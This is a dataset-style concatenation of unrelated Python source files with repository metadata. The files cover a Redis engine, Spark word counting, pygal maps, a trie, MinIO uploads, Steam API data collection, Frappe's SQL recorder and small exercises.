def __init__(
self,
app: Application,
*args,
reconnection_timeoff: int = 10,
shutdown_timeout: int = 5,
**kwargs
) -> None:
self._loop = asyncio.get_event_loop()
self._task: Optional[asyncio.Task] = None
self._result: asyncio.Future = asyncio.Future()
self._connection_info = (args, kwargs)
self._shutdown_timeout = shutdown_timeout
self._reconnection_timeoff = reconnection_timeoff
app.on_startup.append(self._startup)
app.on_shutdown.append(self._shutdown)
app.on_cleanup.append(self._cleanup)
async def _connect(self) -> None:
try:
pool = await aioredis.create_pool(
*self._connection_info[0], **self._connection_info[1]
)
except ConnectionError:
LOG.exception("Redis connection error")
await asyncio.sleep(self._reconnection_timeoff)
self._task = self._loop.create_task(self._connect())
except Exception as e:
LOG.exception("Redis connection error")
self._result.set_exception(e)
else:
LOG.info("Redis connection pool created")
self._result.set_result(pool)
@asynccontextmanager
async def connection(self, timeout: int = 5) -> aioredis.RedisConnection:
async with async_timeout.timeout(timeout):
pool = await asyncio.shield(self._result)
try:
connection = await pool.acquire()
except ConnectionError:
LOG.debug("Connection error while acquiring connection")
self._result = asyncio.Future()
self._task = self._loop.create_task(self._connect())
pool = await asyncio.shield(self._result)
connection = await pool.acquire()
try:
yield connection
finally:
pool.release(connection)
async def status(self, timeout: int = 2) -> bool:
try:
async with self.connection(timeout=timeout) as con:
await con.execute("SET", "xxx_STATUS", 1)
await con.execute("DEL", "xxx_STATUS", 1)
except asyncio.TimeoutError:
return False
except Exception:
LOG.exception("Redis failed status")
return False
else:
LOG.log(4, "Redis status OK")
return True
async def _startup(self, app: Application) -> None:
LOG.debug("Starting Redis engine")
self._task = self._loop.create_task(self._connect())
self._result = asyncio.Future()
async def _shutdown(self, app: Application) -> None:
LOG.debug("Shutting down Redis engine")
if self._task and not self._task.done():
self._task.cancel()
if self._result.done():
pool = await self._result
pool.close()
else:
self._result.cancel()
async def _cleanup(self, app: Application) -> None:
LOG.debug("Cleaning up Redis engine")
try:
pool = await self._result
except asyncio.CancelledError:
pass
else:
await asyncio.wait_for(pool.wait_closed(), timeout=self._shutdown_timeout)
|
[
"[email protected]"
] | |
ce2b890e442ee5d8a8e046307f337c910de700c7
|
14e4606b932f004bb925f9adf847e2c6e1ff16ed
|
/distinct_spark.py
|
459c746293d84841d4ac0969ec58f1517b208683
|
[] |
no_license
|
nyu-cds/dov205_assignment3
|
4cf11dd23b75c24068c6597faa6383e9f3149757
|
189bebb6e3ff9b1612c3b201fac9f2bbbd90d271
|
refs/heads/master
| 2021-01-22T05:28:24.820049 | 2017-05-04T23:58:38 | 2017-05-05T00:01:13 | 81,666,483 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 650 |
py
|
from pyspark import SparkContext
import re
# remove any non-words and split lines into separate words
# finally, convert all words to lowercase
def splitter(line):
line = re.sub(r'^\W+|\W+$', '', line)
return map(str.lower, re.split(r'\W+', line))
def main(sc):
# Read input file.
text = sc.textFile('pg2701.txt')
# Split into words, filter for distinct words, get their count.
count = text.flatMap(splitter) \
.distinct() \
.count()
# Print the number of distinct terms.
print(count)
if __name__ == '__main__':
sc = SparkContext("local", "wordcount")
main(sc)
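# Typical invocation (assuming a local Spark install and pg2701.txt, Project
# Gutenberg's Moby-Dick, in the working directory):
#
#   spark-submit distinct_spark.py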
|
[
"[email protected]"
] | |
37cda467832d9959605d1668f2ef07cc8c293df9
|
ece6f45409ee2bcbff1be64fa1ac98e7805e0e18
|
/API:Data_Visualization/population_json.py
|
78c7c29a84dd29b055d74f7b1bbb767d4b2871b3
|
[] |
no_license
|
PickertJoe/python_exercises
|
5b9ac3334eec32e35a477d126c911d4ca07a4343
|
77955427db9c3342c9a51618a0cd9cf6f884fbee
|
refs/heads/master
| 2022-12-12T11:57:08.267814 | 2019-12-08T21:52:31 | 2019-12-08T21:52:31 | 184,834,676 | 1 | 0 | null | 2022-12-08T05:14:43 | 2019-05-04T00:16:12 |
Python
|
UTF-8
|
Python
| false | false | 1,293 |
py
|
# A program to read and analyze the data in population_data.json
import json
from comma import comma
from country_code import code_search
from pygal.maps.world import World
from pygal.style import RotateStyle
# Importing the data in the json file into a list
filename = "chapter_16/population_data.json"
with open(filename) as f:
population_data = json.load(f)
# Building a dictionary of the population data
cc_populations = {}
for country in population_data:
if country['Year'] == '2010':
country_name = country["Country Name"]
population = int(float(country["Value"]))
code = code_search(country_name)
if code:
cc_populations[code] = population
# Creating three separate categories for different population ranges
cc_pop1, cc_pop2, cc_pop3 = {}, {}, {}
for code, population in cc_populations.items():
if population > 1000000000:
cc_pop1[code] = population
elif population > 10000000:
cc_pop2[code] = population
else:
cc_pop3[code] = population
wm_style = RotateStyle('#336699')
wm = World(style=wm_style)
wm.title = "World Population in 2010, by Select Countries"
wm.add('1bn+', cc_pop1)
wm.add('10m - 1bn', cc_pop2)
wm.add('0-10m', cc_pop3)
wm.render_to_file('country_populations_category.svg')
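# --- Hedged sketch (assumption): the imported code_search helper is not shown
# here; one plausible implementation maps a country name to its two-letter
# code using the COUNTRIES dict shipped with pygal's world map plugin (the
# exact module path varies by pygal version):
#
#   from pygal_maps_world.i18n import COUNTRIES
#
#   def code_search(country_name):
#       for code, name in COUNTRIES.items():
#           if name == country_name:
#               return code
#       return None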
|
[
"[email protected]"
] | |
f3503165cd1ace5452007f7d57957e0c0a1ed163
|
59fbeea017110472a788218db3c6459e9130c7fe
|
/[211]Design Add and Search Words Data Structure.py
|
9980dcd8b49ade61ed4dee0d0b2ac3865846077a
|
[] |
no_license
|
niufenjujuexianhua/Leetcode
|
82b55d9382bc9f63f4d9da9431194e20a4d299f1
|
542c99e038d21429853515f62af51a77deaa4d9c
|
refs/heads/master
| 2022-04-27T16:55:00.035969 | 2022-03-10T01:10:04 | 2022-03-10T01:10:04 | 79,742,663 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,818 |
py
|
# Design a data structure that supports adding new words and finding if a
# string matches any previously added string.
#
# Implement the WordDictionary class:
#
#   WordDictionary() Initializes the object.
#   void addWord(word) Adds word to the data structure; it can be matched later.
#   bool search(word) Returns true if there is any string in the data structure
#     that matches word, or false otherwise. word may contain dots '.', where a
#     dot can be matched with any letter.
#
# Example:
#
#   Input
#   ["WordDictionary","addWord","addWord","addWord","search","search","search","search"]
#   [[],["bad"],["dad"],["mad"],["pad"],["bad"],[".ad"],["b.."]]
#   Output
#   [null,null,null,null,false,true,true,true]
#
#   Explanation
#   WordDictionary wordDictionary = new WordDictionary();
#   wordDictionary.addWord("bad");
#   wordDictionary.addWord("dad");
#   wordDictionary.addWord("mad");
#   wordDictionary.search("pad"); // return False
#   wordDictionary.search("bad"); // return True
#   wordDictionary.search(".ad"); // return True
#   wordDictionary.search("b.."); // return True
#
# Constraints:
#
#   1 <= word.length <= 500
#   word in addWord consists of lower-case English letters.
#   word in search consists of '.' or lower-case English letters.
#   At most 50000 calls will be made to addWord and search.
#
# Related Topics: Backtracking, Depth-first Search, Design, Trie
# leetcode submit region begin(Prohibit modification and deletion)
class Node():
def __init__(self):
self.kids = {}
self.end = False
class WordDictionary(object):
def __init__(self):
self.trie = Node()
def addWord(self, word):
p = self.trie
for c in word:
if c not in p.kids:
p.kids[c] = Node()
p = p.kids[c]
p.end = True
def search(self, word):
p = self.trie
return self._search(p, word, 0)
def _search(self, trie, word, i):
if i == len(word):
return trie.end
if not trie.kids or (word[i] != '.' and word[i] not in trie.kids):
return False
if word[i] != '.':
return self._search(trie.kids[word[i]], word, i + 1)
else:
return any(self._search(trie.kids[node], word, i + 1) for node in trie.kids)
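    # Note: each '.' in the query fans out to every child at that trie level,
    # so the worst case is exponential in the number of dots; with lower-case
    # letters that is at most a 26-way branch per dot.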
# wordDictionary = WordDictionary();
# wordDictionary.addWord("bad");
# wordDictionary.addWord("dad");
# wordDictionary.addWord("mad");
# wordDictionary.search("pad");
# wordDictionary.search("bad");
# wordDictionary.search(".ad");
# wordDictionary.search("b..");
# Your WordDictionary object will be instantiated and called as such:
# obj = WordDictionary()
# obj.addWord(word)
# param_2 = obj.search(word)
# leetcode submit region end(Prohibit modification and deletion)
|
[
"[email protected]"
] | |
2cbf4dec4904b5a4b3767fd1b54f122bd69c3a27
|
81e95540c15acbf47aa0549fdf8aef948953bb1c
|
/Knowledge Graph/KSGAN/data_utils.py
|
36c64430476f2f7ebe55d3afd7ff4ff2abd338cb
|
[] |
no_license
|
TAM-Lab/TAMRepository
|
809c96c027b2f71a836a59e05907bdb3f163c947
|
1099a1b2dd13ed8d3c701c89ba6e3e973f03d3f6
|
refs/heads/master
| 2023-05-14T21:41:25.536228 | 2021-05-30T12:36:57 | 2021-05-30T12:36:57 | 309,056,410 | 1 | 2 | null | 2020-11-05T09:25:24 | 2020-11-01T09:51:23 |
Python
|
UTF-8
|
Python
| false | false | 2,224 |
py
|
from random import randint
from collections import defaultdict
import torch
def heads_tails(n_ent, train_data, valid_data=None, test_data=None):
train_src, train_rel, train_dst = train_data
if valid_data:
valid_src, valid_rel, valid_dst = valid_data
else:
valid_src = valid_rel = valid_dst = []
if test_data:
test_src, test_rel, test_dst = test_data
else:
test_src = test_rel = test_dst = []
all_src = train_src + valid_src + test_src
all_rel = train_rel + valid_rel + test_rel
all_dst = train_dst + valid_dst + test_dst
heads = defaultdict(lambda: set())
tails = defaultdict(lambda: set())
for s, r, t in zip(all_src, all_rel, all_dst):
tails[(s, r)].add(t)
heads[(t, r)].add(s)
heads_sp = {}
tails_sp = {}
for k in tails.keys():
tails_sp[k] = torch.sparse.FloatTensor(torch.LongTensor([list(tails[k])]),
torch.ones(len(tails[k])), torch.Size([n_ent]))
for k in heads.keys():
heads_sp[k] = torch.sparse.FloatTensor(torch.LongTensor([list(heads[k])]),
torch.ones(len(heads[k])), torch.Size([n_ent]))
return heads_sp, tails_sp
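# Note: heads_sp / tails_sp are one-hot sparse vectors over all n_ent
# entities, keyed by (entity, relation); in KG-embedding code such maps are
# typically used to filter known true triples during ranking evaluation.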
def inplace_shuffle(*lists):
idx = []
for i in range(len(lists[0])):
idx.append(randint(0, i))
for ls in lists:
for i, item in enumerate(ls):
j = idx[i]
ls[i], ls[j] = ls[j], ls[i]
def batch_by_num(n_batch, *lists, n_sample=None):
if n_sample is None:
n_sample = len(lists[0])
for i in range(n_batch):
head = int(n_sample * i / n_batch)
tail = int(n_sample * (i + 1) / n_batch)
ret = [ls[head:tail] for ls in lists]
if len(ret) > 1:
yield ret
else:
yield ret[0]
def batch_by_size(batch_size, *lists, n_sample=None):
if n_sample is None:
n_sample = len(lists[0])
head = 0
while head < n_sample:
tail = min(n_sample, head + batch_size)
ret = [ls[head:tail] for ls in lists]
head += batch_size
if len(ret) > 1:
yield ret
else:
yield ret[0]
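# --- Hedged usage sketch (not in the original file) ---
# batch_by_size yields aligned fixed-size slices of the given lists, e.g.:
#   src = [0, 1, 2, 3, 4]; dst = [5, 6, 7, 8, 9]
#   for s, d in batch_by_size(2, src, dst):
#       print(s, d)  # [0, 1] [5, 6], then [2, 3] [7, 8], then [4] [9]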
|
[
"[email protected]"
] | |
72329a9613e01b0ded0f0edac0113fbaacce05e9
|
470e73b3b8f628616c9e8f82499d634b53d70b63
|
/Part 1 - Data Preprocessing/Section 2 -------------------- Part 1 - Data Preprocessing --------------------/Python/data_preprocessing_tools.py
|
bf961270942e41af2b4e77d5ff0b9eac20050cc9
|
[] |
no_license
|
masko101/ml-with-py-and-r
|
31f8013b174f624b57f58bc5b32c1ae963a6581e
|
392635aea2831c46f57079f81e61f1449c6c3236
|
refs/heads/master
| 2023-02-19T02:09:53.844007 | 2023-02-07T21:32:40 | 2023-02-07T21:32:40 | 289,317,728 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,411 |
py
|
# Data Preprocessing Tools
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Data.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
print(X)
print(y)
# Taking care of missing data
from sklearn.impute import SimpleImputer
imputer = SimpleImputer(missing_values=np.nan, strategy='mean')
imputer.fit(X[:, 1:3])
X[:, 1:3] = imputer.transform(X[:, 1:3])
print(X)
# Encoding categorical data
# Encoding the Independent Variable
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder
ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [0])], remainder='passthrough')
X = np.array(ct.fit_transform(X))
print(X)
# Encoding the Dependent Variable
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
y = le.fit_transform(y)
print(y)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 1)
print(X_train)
print(X_test)
print(y_train)
print(y_test)
# Feature Scaling
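# Note: the scaler is fit on the training set only; the test set is
# transformed with the training statistics to avoid data leakage.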
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train[:, 3:] = sc.fit_transform(X_train[:, 3:])
X_test[:, 3:] = sc.transform(X_test[:, 3:])
print(X_train)
print(X_test)
|
[
"[email protected]"
] | |
3666744fd63b20a1ba3fc2432b58097f6f0e3956
|
f49a9212f0566fcd1d6bc8226af545e42501a16f
|
/scrape/scrape.py
|
629525912755ae61eda1d8e2003c4d228ccd8fc9
|
[] |
no_license
|
georgenewman10/python
|
5a5c867e6e5f1723a6ea13cedd3710944411c727
|
cbbd43b40c340e6652fe9a3bf1658f4e54eb8f45
|
refs/heads/master
| 2020-04-24T00:12:36.448042 | 2019-05-09T15:40:07 | 2019-05-09T15:40:07 | 171,559,350 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 310 |
py
|
import requests
from bs4 import BeautifulSoup
url = 'https://www.bovada.lv/sports/basketball/nba-playoffs/'
game = 'portland-trail-blazers-denver-nuggets-201905012105'
url = url + game
# Fetch the page and collect every anchor tag on it
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
links = soup.findAll('a')
print(links)
|
[
"[email protected]"
] | |
65c4da75fb004f1520cb29a69802bcce620518d9
|
40c4b0c31a5870a9201d3d42a63c5547092e5912
|
/frappe/recorder.py
|
8cbcaa01bb980c8cbdc9a77613591f7700643486
|
[
"MIT"
] |
permissive
|
ektai/frappe3
|
fab138cdbe15bab8214cf623d9eb461e9b9fb1cd
|
44aa948b4d5a0d729eacfb3dabdc9c8894ae1799
|
refs/heads/master
| 2022-12-25T15:48:36.926197 | 2020-10-07T09:19:20 | 2020-10-07T09:19:20 | 301,951,677 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,212 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
from collections import Counter
import datetime
import inspect
import json
import re
import time
import traceback
import frappe
import sqlparse
from pygments import highlight
from pygments.lexers import PythonLexer
from pygments.formatters import HtmlFormatter
from frappe import _
RECORDER_INTERCEPT_FLAG = "recorder-intercept"
RECORDER_REQUEST_SPARSE_HASH = "recorder-requests-sparse"
RECORDER_REQUEST_HASH = "recorder-requests"
def sql(*args, **kwargs):
start_time = time.time()
result = frappe.db._sql(*args, **kwargs)
end_time = time.time()
stack = list(get_current_stack_frames())
if frappe.conf.db_type == 'postgres':
query = frappe.db._cursor.query
else:
query = frappe.db._cursor._executed
query = sqlparse.format(query.strip(), keyword_case="upper", reindent=True)
# Collect EXPLAIN for executed query
if query.lower().strip().split()[0] in ("select", "update", "delete"):
# Only SELECT/UPDATE/DELETE queries can be "EXPLAIN"ed
explain_result = frappe.db._sql("EXPLAIN {}".format(query), as_dict=True)
else:
explain_result = []
data = {
"query": query,
"stack": stack,
"explain_result": explain_result,
"time": start_time,
"duration": float("{:.3f}".format((end_time - start_time) * 1000)),
}
frappe.local._recorder.register(data)
return result
def get_current_stack_frames():
current = inspect.currentframe()
frames = inspect.getouterframes(current, context=10)
for frame, filename, lineno, function, context, index in list(reversed(frames))[:-2]:
if "/apps/" in filename:
yield {
"filename": re.sub(".*/apps/", "", filename),
"lineno": lineno,
"function": function,
"context": "".join(context),
"index": index,
"locals": json.dumps(frame.f_locals, skipkeys=True, default=str)
}
def record():
if __debug__:
if frappe.cache().get_value(RECORDER_INTERCEPT_FLAG):
frappe.local._recorder = Recorder()
def dump():
if __debug__:
if hasattr(frappe.local, "_recorder"):
frappe.local._recorder.dump()
class Recorder():
def __init__(self):
self.uuid = frappe.generate_hash(length=10)
self.time = datetime.datetime.now()
self.calls = []
self.path = frappe.request.path
self.cmd = frappe.local.form_dict.cmd or ""
self.method = frappe.request.method
self.headers = dict(frappe.local.request.headers)
self.form_dict = frappe.local.form_dict
_patch()
def register(self, data):
self.calls.append(data)
def dump(self):
request_data = {
"uuid": self.uuid,
"path": self.path,
"cmd": self.cmd,
"time": self.time,
"queries": len(self.calls),
"time_queries": float("{:0.3f}".format(sum(call["duration"] for call in self.calls))),
"duration": float("{:0.3f}".format((datetime.datetime.now() - self.time).total_seconds() * 1000)),
"method": self.method,
}
frappe.cache().hset(RECORDER_REQUEST_SPARSE_HASH, self.uuid, request_data)
frappe.publish_realtime(event="recorder-dump-event", message=json.dumps(request_data, default=str))
self.mark_duplicates()
request_data["calls"] = self.calls
request_data["headers"] = self.headers
request_data["form_dict"] = self.form_dict
frappe.cache().hset(RECORDER_REQUEST_HASH, self.uuid, request_data)
def mark_duplicates(self):
counts = Counter([call["query"] for call in self.calls])
for index, call in enumerate(self.calls):
call["index"] = index
call["exact_copies"] = counts[call["query"]]
def _patch():
frappe.db._sql = frappe.db.sql
frappe.db.sql = sql
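# Note: _patch keeps the original frappe.db.sql on frappe.db._sql and installs
# the recording wrapper above in its place; do_not_record below restores the
# original so whitelisted recorder endpoints are not themselves recorded.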
def do_not_record(function):
def wrapper(*args, **kwargs):
if hasattr(frappe.local, "_recorder"):
del frappe.local._recorder
frappe.db.sql = frappe.db._sql
return function(*args, **kwargs)
return wrapper
def administrator_only(function):
def wrapper(*args, **kwargs):
if frappe.session.user != "Administrator":
frappe.throw(_("Only Administrator is allowed to use Recorder"))
return function(*args, **kwargs)
return wrapper
@frappe.whitelist()
@do_not_record
@administrator_only
def status(*args, **kwargs):
return bool(frappe.cache().get_value(RECORDER_INTERCEPT_FLAG))
@frappe.whitelist()
@do_not_record
@administrator_only
def start(*args, **kwargs):
frappe.cache().set_value(RECORDER_INTERCEPT_FLAG, 1)
@frappe.whitelist()
@do_not_record
@administrator_only
def stop(*args, **kwargs):
frappe.cache().delete_value(RECORDER_INTERCEPT_FLAG)
@frappe.whitelist()
@do_not_record
@administrator_only
def get(uuid=None, *args, **kwargs):
if uuid:
result = frappe.cache().hget(RECORDER_REQUEST_HASH, uuid)
lexer = PythonLexer(tabsize=4)
for call in result["calls"]:
for stack in call["stack"]:
formatter = HtmlFormatter(noclasses=True, hl_lines=[stack["index"] + 1])
stack["context"] = highlight(stack["context"], lexer, formatter)
else:
result = list(frappe.cache().hgetall(RECORDER_REQUEST_SPARSE_HASH).values())
return result
@frappe.whitelist()
@do_not_record
@administrator_only
def delete(*args, **kwargs):
frappe.cache().delete_value(RECORDER_REQUEST_SPARSE_HASH)
frappe.cache().delete_value(RECORDER_REQUEST_HASH)
|
[
"[email protected]"
] | |
e526dff4533b0e9972e26f65b6d19e52f181525e
|
9e36de2b7954ce9d093bf7512faa8e66047ba34e
|
/main.py
|
1035f7b2cc27442b8df828a62bb96d47a4bcd618
|
[] |
no_license
|
hlcooll/minioY
|
1928e39cc3e0a7965c7c37a811ccd537256c92bb
|
3026798b18528acfc92579e4876ba9eacb6536cf
|
refs/heads/main
| 2023-02-17T20:03:29.513388 | 2021-01-22T07:31:46 | 2021-01-22T07:31:46 | 331,869,131 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,416 |
py
|
from minio import Minio
from minio.error import S3Error
from progress.prog import Progress
minioClient = Minio('127.0.0.1:9000',
                    access_key='username',  # placeholder credentials
secret_key='password',secure=False
)
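# Note: secure=False disables TLS, which is fine for a local MinIO server on
# 127.0.0.1; use secure=True and real credentials against a remote deployment.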
# Create bucket.
class minioCreateBucket(object):
    # init: create the bucket on construction (S3 errors are printed, not raised)
def __init__(self,newPersonName):
self.name=newPersonName
try:
minioClient.make_bucket(self.name, location="us-east-1")
except S3Error as err:
print(err)
# Upload data.
def upload(self,object,filename):
try:
minioClient.fput_object(self.name, object,
filename)
except FileNotFoundError as err:
print(err)
except S3Error as err:
print(err)
# Upload data with progress bar.
def uploadResult(self,object,filename):
result = minioClient.fput_object(
self.name, object, filename,
progress=Progress(),
)
print(
"created {0} object; etag: {1}, version-id: {2}".format(
result.object_name, result.etag, result.version_id,
),
)
if __name__ == '__main__':
object_name='sw.md'
filename_url="/Users/hualei/hugo/hlcooll.github.io/content/kubernetes/ceph/ceph.md"
miniB = minioCreateBucket("maylogs")
miniB.uploadResult(object_name,filename_url)
|
[
"[email protected]"
] | |
871e74c940da56c3387dffad57b313ca22cdc089
|
9d961bd6a590cc96db0c1f9c72d84e3a66636edf
|
/심심풀이땅콩/[백준]4673.py
|
76fb463f5fde7bf3313b00ca4769b70034e63f75
|
[] |
no_license
|
0equal2/Python_Programming
|
bae65338929e8e1a88247b8d23de805caa026702
|
2ac1d0262320220f49cbdb45e787e55e994d0b0f
|
refs/heads/master
| 2023-05-14T22:13:41.583214 | 2021-06-09T03:04:51 | 2021-06-09T03:04:51 | 304,628,012 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 195 |
py
|
# [Baekjoon] 4673: print every "self number" below 10001, i.e. every number
# that cannot be written as n + digit_sum(n) for any positive integer n.
memo=[0]*10001
for i in range(1,10001):
newnum=i+sum(list(map(int,list(str(i)))))
if newnum<=10000:
memo[newnum]=1
if memo[i]==0:
print(i)
|
[
"[email protected]"
] | |
33478fe87820b50085a43d69c5d4905485208e70
|
aec63b7086f30d5b10c9da01f6b2a2fa3bd1dfe0
|
/blog/migrations/0002_blogpost_user.py
|
f726647c04b6bf69de6f6c3fae79606d4741c9e8
|
[] |
no_license
|
Ajith1202/BlogPost
|
711933c562a88b42509e3babe42171d0b39e229a
|
91417ec65635534ae37aebe144963b28e2f3dd19
|
refs/heads/master
| 2022-08-01T19:22:05.732859 | 2020-05-29T06:31:31 | 2020-05-29T06:31:31 | 267,769,047 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 585 |
py
|
# Generated by Django 3.0.6 on 2020-05-27 09:15
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='blogpost',
name='user',
field=models.ForeignKey(default=1, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
[
"[email protected]"
] | |
7ff1083ed831a508777187c4dcf4392f0dcd3481
|
efbe77abe49694f853b48f0726aa4968224b1a2b
|
/my_project/src/collect_new_user.py
|
9dcb44e072110bfa8e2b81b694432b33802afb11
|
[] |
no_license
|
johnnysand7/steam-study
|
f7cc918418fa77ede1fc2a1d04d83849b26a28d7
|
17100b97ade1d4b0d0ee273c071b9efa4cf3ee10
|
refs/heads/master
| 2021-01-21T14:24:05.004016 | 2016-06-24T17:52:10 | 2016-06-24T17:52:10 | 55,985,030 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,665 |
py
|
import cPickle
import operator
import os
import re
import requests
import time
import pandas as pd
import graphlab  # needed below for graphlab.SFrame; missing from the original imports
from bs4 import BeautifulSoup
class CollectNewUser():
def __init__(self, popular_games):
self.popular_games = popular_games
self.uid = self.determine_user_input()
self.key = os.environ["ACCESS_STEAM"]
self.bans = None
self.user = None
self.friends = None
def determine_user_input(self):
user_input = raw_input("Paste your Steam community profile url here: ")
if len(user_input) == 17:
if user_input.isdigit():
return user_input
else:
return "Maybe you tried your 17-digt Steam ID,\
which was not recognized"
elif "steamcommunity.com" not in user_input:
return "Must be a Steam Community URL!"
else:
try:
response = requests.get(user_input)
uid = re.findall(r"[0-9]{17}", response.text)[0]
if len(uid) != 17:
return "Url did not work"
return uid
except IndexError:
return "Could not find your profile."
except requests.ConnectionError:
return "Could not find your profile."
def get_user_info(self):
"""
For my model, I need the new user's:
personastate
location (eventually)
profile avatar url (eventually)
other things?
"""
url = "http://api.steampowered.com/ISteamUser/GetPlayerSummaries"\
+ "/v0002/?key=" + self.key + "&steamids=" + self.uid
user = requests.get(url).json()["response"]["players"][0]
if user["communityvisibilitystate"] == 1:
return None
self.user = {k: user[k] for k in ("personastate", "timecreated",
"steamid")}
def get_bans(self):
url = "http://api.steampowered.com/ISteamUser/GetPlayerBans"\
+ "/v1/?key=" + self.key + "&steamids=" + self.uid
response = requests.get(url)
self.s_code = str(response.status_code).startswith("2")
ban = response.json()["players"][0]
desired_keys = set(ban.keys()) - set(["SteamId", "DaysSinceLastBan",
"EconomyBan", "NumberOfGameBans",
"NumberOfVACBans"])
self.bans = {k: ban[k] for k in desired_keys}
def get_friends(self):
url = "http://api.steampowered.com/ISteamUser/GetFriendList/v0001\
/?key=" + self.key + "&steamid=" + self.uid + "&relationship=all"
response = requests.get(url)
if str(response.status_code).startswith("2"):
friends = response.json()["friendslist"]["friends"]
excluding = set(["relationship"])
self.friends = len(friends)
else:
return None
def get_game_info(self):
url = "http://api.steampowered.com/IPlayerService/GetOwnedGames"\
+ "/v0001/?key=" + self.key + "&steamid=" + self.uid + \
"&include_appinfo=1&include_played_free_games=1&format=json"
response = requests.get(url)
if str(response.status_code).startswith("2"):
try:
games = response.json()["response"]["games"]
for i, game in enumerate(games):
desired_keys = set(game.keys()) -\
set(["has_community_visible_stats",
"img_icon_url", "img_logo_url"])
if "playtime_2weeks" in desired_keys:
game = {k: game[k] for k in desired_keys}
games[i] = game
else:
game = {k: game[k] for k in desired_keys}
game[u"playtime_2weeks"] = 0
games[i] = game
return games
except KeyError:
return None
else:
return None
def game_user_frames(self):
game_df = pd.DataFrame(self.get_game_info())
owned, played = len(game_df), len(game_df[game_df["playtime_forever"
] != 0])
game_df = game_df[game_df["appid"].isin(self.popular_games)]
game_df["rating"] = pd.cut(game_df["playtime_forever"],
bins=[-1, 60, 120, 180, 240, 300,
10e10],
labels=[0, 1, 2, 3, 4, 5]).astype(int)
game_df["user_id"] = ((self.uid+" ") * len(game_df)).split()
game_df["item_id"] = game_df["appid"].astype(int)
game_df = game_df[["item_id", "rating", "user_id"]]
game_df = graphlab.SFrame(game_df)
user_dict = dict(self.bans.items() + self.user.items() +
[("num_friends", self.friends),
("num_played", played),
("num_games", owned)])
user_df = pd.DataFrame([user_dict])
user_df["timecreated"] = int(round((time.time() -
user_df["timecreated"]) /
(3600 * 24 * 365), 2))
user_df.rename(columns={"steamid": "user_id"}, inplace=True)
user_df = graphlab.SFrame(user_df)
return user_df, game_df
if __name__ == "__main__":
with open("../data/top_appids.csv", "rb") as f:
game_ids = f.read()
game_ids = game_ids.replace("\n", "").split(",")[2:]
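    # --- Hedged continuation sketch (not in the original file): the script
    # stops after loading the popular-game ids; a natural next step might be:
    #   collector = CollectNewUser(game_ids)
    #   collector.get_user_info()
    #   collector.get_bans()
    #   collector.get_friends()
    #   user_df, game_df = collector.game_user_frames()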
|
[
"[email protected]"
] | |
2055a94fef3753eb2044e88777c867cb70cfd5ba
|
0fc2b11f52085b584bc52f4982c297dd2c03e8b2
|
/Programmers/Level1/콜라츠 추측.py
|
6a895e14e41a65d5df6cf3b720dade065a7454ed
|
[] |
no_license
|
yw9142/Solving-algorithmic-problems
|
ec9cdb23492ec10e494937f6f221d54d8987be3d
|
d78b2d518608bd89b463a0e8da1ca30e1dddaec3
|
refs/heads/master
| 2023-01-10T06:52:55.938545 | 2020-11-10T16:09:05 | 2020-11-10T16:09:05 | 277,123,609 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 313 |
py
|
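# Programmers (Level 1), Collatz conjecture: count the steps needed to reach 1
# (halve if even, 3n+1 if odd); return -1 if 1 is not reached within 500 steps.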
def solution(num):
if num == 1:
return 0
count = 0
while True:
if num % 2 == 0:
num //= 2
else:
num = (num * 3) + 1
count += 1
if num == 1:
break
if count >= 500:
return -1
return count
|
[
"[email protected]"
] | |
618421f2c2ca41e846e9a550696550ebdaf5f9b0
|
05d04370e2547aba75c5a6ddfab52ee66a4421ce
|
/ccpweb/ccpweb/views.py
|
35e5668861f40f36e8c3866e01adb1ef928d98ee
|
[
"BSD-3-Clause"
] |
permissive
|
story645/ccp-viz-toolkit
|
4488404518dee1b4dc0cb33ac51c19aa15ee3156
|
cd75f674d7b17a2bba8ed4bffb6853fae94885c5
|
refs/heads/master
| 2020-05-19T09:20:37.152986 | 2015-03-26T16:32:14 | 2015-03-26T16:32:14 | 32,113,131 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,425 |
py
|
#!/usr/bin/env python
#
# views.py
#
# Hannah Aizenman, 2011-08
#
# http://www.opensource.org/licenses/bsd-license.php
"""Views (web pages) served by ccpweb.
"""
__docformat__ = "restructuredtext"
# http://docs.python.org/library/os.html
import os
# https://docs.pylonsproject.org/projects/pyramid/1.0/api/response.html
from pyramid.response import Response
# http://docs.pylonsproject.org/projects/pyramid/1.0/api/view.html
from pyramid.view import view_config
# http://docs.pylonsproject.org/projects/pyramid/1.0/api/exceptions.html
from pyramid.exceptions import NotFound
from ccplib.datahandlers.ccpdata import CCPData
from ccpweb.resources import DataList, AlgList, Static
from ccpweb import tasks
SITE_LIB_ROOT = os.path.abspath(os.path.dirname(__file__))
# ccpviz.html
@view_config(context=Static, request_method='GET')
def page_view(context, request):
key = request.traversed[0]
